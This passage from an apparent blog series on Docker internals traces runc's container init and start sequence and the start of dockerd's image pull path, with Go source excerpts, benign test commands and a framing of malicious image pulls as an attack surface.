    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">startInitialization</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">startInitialization</span><span class="p">()</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">envInitPipe</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">Getenv</span><span class="p">(</span><span class="s">"_LIBCONTAINER_INITPIPE"</span><span class="p">)</span>
    <span class="n">initPipeFd</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">strconv</span><span class="o">.</span><span class="n">Atoi</span><span class="p">(</span><span class="n">envInitPipe</span><span class="p">)</span>
    <span class="n">initPipe</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">NewFile</span><span class="p">(</span><span class="kt">uintptr</span><span class="p">(</span><span class="n">initPipeFd</span><span class="p">),</span> <span class="s">"init"</span><span class="p">)</span> <span class="c">// use as Go file object</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">config</span> <span class="n">initConfig</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">NewDecoder</span><span class="p">(</span><span class="n">initPipe</span><span class="p">)</span><span class="o">.</span><span class="n">Decode</span><span class="p">(</span><span class="o">&amp;</span><span class="n">config</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">containerInit</span><span class="p">(</span><span class="n">it</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">config</span><span class="p">,</span> <span class="n">syncPipe</span><span class="p">,</span> <span class="n">consoleSocket</span><span class="p">,</span> <span class="n">pidfdSocket</span><span class="p">,</span> <span class="n">fifoFile</span><span class="p">,</span> <span class="n">logPipe</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">containerInit()</code> handles two init types. If a new container is being created, the init type will be <code class="language-plaintext highlighter-rouge">initStandard</code> [1]; otherwise, when attaching to an already-running container, <code class="language-plaintext highlighter-rouge">initSetns</code> is used [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/init_linux.go</span>
<span class="k">func</span> <span class="n">containerInit</span><span class="p">(</span><span class="n">t</span> <span class="n">initType</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">initConfig</span><span class="p">,</span> <span class="n">pipe</span> <span class="o">*</span><span class="n">syncSocket</span><span class="p">,</span> <span class="n">consoleSocket</span><span class="p">,</span> <span class="n">pidfdSocket</span><span class="p">,</span> <span class="n">fifoFile</span><span class="p">,</span> <span class="n">logPipe</span> <span class="o">*</span><span class="n">os</span><span class="o">.</span><span class="n">File</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">t</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">initSetns</span><span class="o">:</span> <span class="c">// [2]</span>
        <span class="n">i</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">linuxSetnsInit</span><span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="n">i</span><span class="o">.</span><span class="n">Init</span><span class="p">()</span>
    <span class="k">case</span> <span class="n">initStandard</span><span class="o">:</span> <span class="c">// [1]</span>
        <span class="n">i</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">linuxStandardInit</span><span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="n">i</span><span class="o">.</span><span class="n">Init</span><span class="p">()</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">runc init</code> now is still <strong>root</strong> and has <strong>full privileges</strong> inside the namespaces. It sets up the environment inside the container, such as network routing [3] and the filesystem [4]. Later, it calls <code class="language-plaintext highlighter-rouge">finalizeNamespace()</code> [5] to <strong>drop capabilities</strong>, change the working directory, and close all leaked file descriptors.</p>

<p>Before executing the entrypoint binary [6], it reopens the FIFO file with only write permission [7], and this behavior causes <code class="language-plaintext highlighter-rouge">runc init</code> to <strong>be blocked</strong> until someone opens the same FIFO file with read permission.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/standard_init_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">linuxStandardInit</span><span class="p">)</span> <span class="n">Init</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">setupNetwork</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">prepareRootfs</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">pipe</span><span class="p">,</span> <span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">finalizeNamespace</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">fifoFile</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">pathrs</span><span class="o">.</span><span class="n">Reopen</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">fifoFile</span><span class="p">,</span> <span class="n">unix</span><span class="o">.</span><span class="n">O_WRONLY</span><span class="o">|</span><span class="n">unix</span><span class="o">.</span><span class="n">O_CLOEXEC</span><span class="p">)</span> <span class="c">// [7]</span>
    <span class="c">// [...]</span>
    <span class="n">name</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">exec</span><span class="o">.</span><span class="n">LookPath</span><span class="p">(</span><span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">0</span><span class="p">])</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">linux</span><span class="o">.</span><span class="n">Exec</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Args</span><span class="p">,</span> <span class="n">l</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Env</span><span class="p">)</span> <span class="c">// [6]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You can probably guess who the reader is. That’s right, it’s <code class="language-plaintext highlighter-rouge">runc start</code>!</p>

<h3 id="23-cmd-start">2.3. Cmd: start</h3>

<p><code class="language-plaintext highlighter-rouge">runc init</code> is blocked and waiting for a reader, and now the status of the container is <code class="language-plaintext highlighter-rouge">Created</code>.</p>

<p>The shim handles the start-container request by executing <code class="language-plaintext highlighter-rouge">runc start</code>, and the action callback calls <code class="language-plaintext highlighter-rouge">container.Exec()</code> [1] when the status of the container is <code class="language-plaintext highlighter-rouge">Created</code> [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// start.go</span>
<span class="k">var</span> <span class="n">startCommand</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">{</span>
    <span class="n">Name</span><span class="o">:</span>  <span class="s">"start"</span><span class="p">,</span>
    <span class="n">Action</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cmd</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">getContainer</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="k">switch</span> <span class="n">status</span> <span class="p">{</span>
        <span class="k">case</span> <span class="n">libcontainer</span><span class="o">.</span><span class="n">Created</span><span class="o">:</span> <span class="c">// [2]</span>
                <span class="c">// [...]</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">Exec</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [1]</span>
                <span class="c">// [...]</span>
            <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Exec()</code> finally calls <code class="language-plaintext highlighter-rouge">handleFifo()</code> [3] to open the FIFO file with read permission, which allows <code class="language-plaintext highlighter-rouge">runc init</code> to continue running and enter the container.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">Exec</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">exec</span><span class="p">()</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">exec</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">path</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">stateDir</span><span class="p">,</span> <span class="n">execFifoFilename</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">handleFifo</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">initProcess</span><span class="o">.</span><span class="n">pid</span><span class="p">());</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">postStart</span><span class="p">()</span> <span class="c">// run Poststart hook</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="24-others">2.4. Others</h3>

<p>If you want to test these behaviors directly by <code class="language-plaintext highlighter-rouge">runc</code>, you can follow the steps below.</p>

<p>First, create a bundle directory to save the root filesystem and <code class="language-plaintext highlighter-rouge">config.json</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir </span>container_bundle
<span class="nb">cd </span>container_bundle
</code></pre></div></div>

<p>Then extract the root filesystem from a docker image into the <code class="language-plaintext highlighter-rouge">rootfs</code> directory.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker create <span class="nt">--name</span> temp ubuntu:24.04
<span class="nb">mkdir </span>rootfs
docker <span class="nb">export </span>temp | <span class="nb">tar</span> <span class="nt">-C</span> rootfs <span class="nt">-xvf</span> -
docker <span class="nb">rm </span>temp
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">runc</code> “spec” command can generate a default OCI spec <code class="language-plaintext highlighter-rouge">config.json</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>runc spec
</code></pre></div></div>

<p>Modify <code class="language-plaintext highlighter-rouge">config.json</code> to update the entry command.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">{</span>
    "ociVersion": "1.2.1",
    "process": {
        ...
<span class="gi">+       "terminal": false,
</span><span class="gd">-       "terminal": true,
</span>        "args": [
<span class="gd">-           "sh"
</span><span class="gi">+           "/usr/bin/sleep", "3600"
</span>        ]
</code></pre></div></div>

<p>Now you can create a container based on the bundle.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>runc create <span class="nt">--bundle</span> <span class="nb">.</span> my_container_id
</code></pre></div></div>

<p>View the status of all containers, and our container is created.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>runc list
ID                PID         STATUS      BUNDLE                  CREATED                          OWNER
my_container_id   63886       created     /tmp/container_bundle   2026-06-04T03:54:00.492598105Z   root
</code></pre></div></div>

<p>If you list the fds of this container, you can find that there is a FIFO file.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">ls</span> <span class="nt">-al</span> /proc/63886/fd/
<span class="c"># [...]</span>
l--------- 1 root root 64 Jun  4 11:55 7 -&gt; /run/runc/my_container_id/exec.fifo
<span class="c"># [...]</span>
</code></pre></div></div>

<p>After starting the container, you can see our entry command <code class="language-plaintext highlighter-rouge">sleep 3600</code> is running now!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>runc start my_container_id

ps aux | <span class="nb">grep sleep
</span>root       64268  0.0  0.0   2704  1688 ?        Ss   12:05   0:00 /usr/bin/sleep 3600
</code></pre></div></div>

<h2 id="3-summary">3. Summary</h2>

<p>This post covers the process of loading a container, including the implementation of <code class="language-plaintext highlighter-rouge">runc</code>. In the next post, I will analyze runtime replacement and the hook interfaces exposed by Docker, using the NVIDIA Toolkit as an example.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[In the third post, we’ll discuss how the container is loaded.]]></summary></entry><entry><title type="html">Docker Internal (2)</title><link href="https://u1f383.github.io/linux/2026/06/02/Docker-Internal-2.html" rel="alternate" type="text/html" title="Docker Internal (2)" /><published>2026-06-02T00:00:00+00:00</published><updated>2026-06-02T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/06/02/Docker-Internal-2</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/06/02/Docker-Internal-2.html"><![CDATA[<p>In the last post, we introduced the relationship between the components in the Docker system, and in this post, we’ll discuss the attack surfaces.</p>

<h2 id="1-pull-an-image">1. Pull an Image</h2>

<p>Imagine you just run <code class="language-plaintext highlighter-rouge">docker pull &lt;image&gt;</code> and then you’ve been pwned (just an example 😝). Yeah, the first attack surface is quite straightforward: when you download a <strong>malicious image</strong> which is published by an attacker, the Docker daemon parses the metadata, extracts the compressed files, and saves them into the filesystem. During this process, the crafted file may affect host data if bugs or vulnerabilities exist.</p>

<p>In this post, we’ll analyze how Docker pulls an image, parses the metadata, and extracts the files. We’ll also explore potential attack surfaces in the end.</p>

<h3 id="11-setup-environment">1.1. Setup Environment</h3>

<p>To understand the image fetching process, we can run a proxy and intercept the HTTP request between the daemon and the registry server. Here, I use <code class="language-plaintext highlighter-rouge">mitmproxy</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mitmproxy <span class="nt">--listen-host</span> 127.0.0.1 <span class="nt">--listen-port</span> 8080
</code></pre></div></div>

<p>And write the config below to <code class="language-plaintext highlighter-rouge">/etc/systemd/system/docker.service.d/http-proxy.conf</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Service]
Environment="HTTP_PROXY=http://127.0.0.1:8080"
Environment="HTTPS_PROXY=http://127.0.0.1:8080"
</code></pre></div></div>

<p>Then restart the <code class="language-plaintext highlighter-rouge">dockerd</code> daemon to reload the configuration:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>systemctl daemon-reload  <span class="c"># reload config</span>
<span class="nb">sudo </span>systemctl restart docker <span class="c"># restart dockerd</span>
</code></pre></div></div>

<p>After that, you can read the intercepted HTTP request in mitmproxy’s TUI when you run <code class="language-plaintext highlighter-rouge">docker pull ubuntu:24.04</code>:</p>

<p><img src="/assets/image-20260601000000000.png" alt="image-20260601000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<h3 id="12-auth--head-manifest">1.2. Auth &amp; HEAD Manifest</h3>

<p>Run <code class="language-plaintext highlighter-rouge">docker pull ubuntu:24.04</code> and the docker-cli sends the following HTTP request to <code class="language-plaintext highlighter-rouge">dockerd</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /v1.54/images/create?fromImage=docker.io%2Flibrary%2Fubuntu&amp;tag=24.04
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 0
X-Registry-Auth: e30=
</code></pre></div></div>

<p>The pull image request is handled by the <code class="language-plaintext highlighter-rouge">"/images/create"</code> endpoint of <code class="language-plaintext highlighter-rouge">dockerd</code>, whose handler is <code class="language-plaintext highlighter-rouge">postImagesCreate()</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/image/image.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">ir</span> <span class="o">*</span><span class="n">imageRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">ir</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/images/create"</span><span class="p">,</span> <span class="n">ir</span><span class="o">.</span><span class="n">postImagesCreate</span><span class="p">),</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">pullTag()</code> is called internally, and it creates a resolver object [1] and pulls the target image [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/image/image_routes.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">ir</span> <span class="o">*</span><span class="n">imageRouter</span><span class="p">)</span> <span class="n">postImagesCreate</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">img</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span>
        <span class="c">// ref = "docker.io/library/ubuntu:24.04" in here</span>
        <span class="n">progressErr</span> <span class="o">=</span> <span class="n">ir</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">PullImage</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="n">pullOptions</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/containerd/image_pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span><span class="n">ImageService</span><span class="p">)</span> <span class="n">PullImage</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">baseRef</span> <span class="n">reference</span><span class="o">.</span><span class="n">Named</span><span class="p">,</span> <span class="n">options</span> <span class="n">imagebackend</span><span class="o">.</span><span class="n">PullOptions</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="o">!</span><span class="n">reference</span><span class="o">.</span><span class="n">IsNameOnly</span><span class="p">(</span><span class="n">baseRef</span><span class="p">)</span> <span class="p">{</span> <span class="c">// "docker.io/library/ubuntu:24.04" has tag "24.04"</span>
        <span class="k">return</span> <span class="n">i</span><span class="o">.</span><span class="n">pullTag</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">baseRef</span><span class="p">,</span> <span class="n">platform</span><span class="p">,</span> <span class="n">options</span><span class="o">.</span><span class="n">MetaHeaders</span><span class="p">,</span> <span class="n">options</span><span class="o">.</span><span class="n">AuthConfig</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span><span class="n">ImageService</span><span class="p">)</span> <span class="n">pullTag</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="n">reference</span><span class="o">.</span><span class="n">Named</span><span class="p">,</span> <span class="n">platform</span> <span class="o">*</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Platform</span><span class="p">,</span> <span class="n">metaHeaders</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">][]</span><span class="kt">string</span><span class="p">,</span> <span class="n">authConfig</span> <span class="o">*</span><span class="n">registrytypes</span><span class="o">.</span><span class="n">AuthConfig</span><span class="p">,</span> <span class="n">out</span> <span class="n">progress</span><span class="o">.</span><span class="n">Output</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">resolver</span><span class="p">,</span> <span class="n">_</span> <span class="o">:=</span> <span class="n">i</span><span class="o">.</span><span class="n">newResolverFromAuthConfig</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">authConfig</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="n">metaHeaders</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="n">opts</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">opts</span><span class="p">,</span> <span class="n">containerd</span><span class="o">.</span><span class="n">WithResolver</span><span class="p">(</span><span class="n">resolver</span><span class="p">))</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">i</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Pull</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ref</span><span class="o">.</span><span class="n">String</span><span class="p">(),</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The resolver object is allocated and initialized by <code class="language-plaintext highlighter-rouge">newResolverFromAuthConfig()</code>, and eventually a <code class="language-plaintext highlighter-rouge">dockerResolver</code> object is returned [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/containerd/resolver.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span><span class="n">ImageService</span><span class="p">)</span> <span class="n">newResolverFromAuthConfig</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">authConfig</span> <span class="o">*</span><span class="n">registrytypes</span><span class="o">.</span><span class="n">AuthConfig</span><span class="p">,</span> <span class="n">ref</span> <span class="n">reference</span><span class="o">.</span><span class="n">Named</span><span class="p">,</span> <span class="n">metaHeaders</span> <span class="n">http</span><span class="o">.</span><span class="n">Header</span><span class="p">)</span> <span class="p">(</span><span class="n">remotes</span><span class="o">.</span><span class="n">Resolver</span><span class="p">,</span> <span class="n">docker</span><span class="o">.</span><span class="n">StatusTracker</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="c">/**
     * i.registryHosts
     * == (daemon/containerd/service.go) config.RegistryHosts
     * == (daemon/daemon.go) d.RegistryHosts
     * == (daemon/hosts.go) func (daemon *Daemon) RegistryHosts(host string)
     */</span>
    <span class="n">hosts</span> <span class="o">:=</span> <span class="n">hostsWrapper</span><span class="p">(</span><span class="n">i</span><span class="o">.</span><span class="n">registryHosts</span><span class="p">,</span> <span class="n">authConfig</span><span class="p">,</span> <span class="n">ref</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">docker</span><span class="o">.</span><span class="n">NewResolver</span><span class="p">(</span><span class="n">docker</span><span class="o">.</span><span class="n">ResolverOptions</span><span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="n">Hosts</span><span class="o">:</span>   <span class="n">hosts</span><span class="p">,</span> <span class="c">// hosts == a wraper function of RegistryHosts()</span>
        <span class="n">Tracker</span><span class="o">:</span> <span class="n">tracker</span><span class="p">,</span>
        <span class="n">Headers</span><span class="o">:</span> <span class="n">headers</span><span class="p">,</span>
    <span class="p">})</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.go</span>
<span class="k">func</span> <span class="n">NewResolver</span><span class="p">(</span><span class="n">options</span> <span class="n">ResolverOptions</span><span class="p">)</span> <span class="n">remotes</span><span class="o">.</span><span class="n">Resolver</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">dockerResolver</span><span class="p">{</span> <span class="c">// [3]</span>
        <span class="n">hosts</span><span class="o">:</span>         <span class="n">options</span><span class="o">.</span><span class="n">Hosts</span><span class="p">,</span>
        <span class="n">header</span><span class="o">:</span>        <span class="n">options</span><span class="o">.</span><span class="n">Headers</span><span class="p">,</span>
        <span class="n">resolveHeader</span><span class="o">:</span> <span class="n">resolveHeader</span><span class="p">,</span>
        <span class="n">tracker</span><span class="o">:</span>       <span class="n">options</span><span class="o">.</span><span class="n">Tracker</span><span class="p">,</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Pull()</code> calls <code class="language-plaintext highlighter-rouge">c.fetch()</code> to download the target image [4] and then persists the image to <code class="language-plaintext highlighter-rouge">containerd</code>’s image metadata store [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">Pull</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">RemoteOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">Image</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pullCtx</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="m">1</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">createNewImage</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">img</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">fetch()</code> is the key function, and here we only focus on the <code class="language-plaintext highlighter-rouge">rCtx.Resolver.Resolve()</code> call. It takes the <code class="language-plaintext highlighter-rouge">ref</code> as a parameter, which is a string including the <strong>image name</strong> and the <strong>tag</strong> (in our case, <code class="language-plaintext highlighter-rouge">"docker.io/library/ubuntu:24.04"</code>).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="n">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="p">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">rCtx</span> <span class="o">*</span><span class="n">RemoteContext</span><span class="p">,</span> <span class="n">ref</span> <span class="n">string</span><span class="p">,</span> <span class="n">limit</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">images</span><span class="p">.</span><span class="n">Image</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// [...]</span>
